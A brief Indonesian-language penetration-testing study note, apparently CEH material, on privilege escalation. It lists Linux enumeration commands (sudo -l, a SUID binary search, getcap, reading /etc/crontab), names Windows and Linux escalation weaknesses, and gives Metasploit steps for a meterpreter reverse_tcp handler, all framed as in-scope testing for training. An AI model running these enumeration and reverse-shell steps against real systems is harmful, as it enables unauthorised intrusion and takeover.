Eksploitasi Sistem & Privilege Escalation
Setelah mendapat akses awal, naikkan hak (CEH phase 3-4):
sudo -l
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab
Di Linux: SUID binari yang salah konfigurasi, sudo tanpa password, capability berlebih, kernel lama. Di Windows: unquoted service path, AlwaysInstallElevated, token impersonation. Metasploit untuk eksploitasi terkontrol:
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
Fokus: minimal privilege needed, jangan eksploitasi lebih jauh dari scope.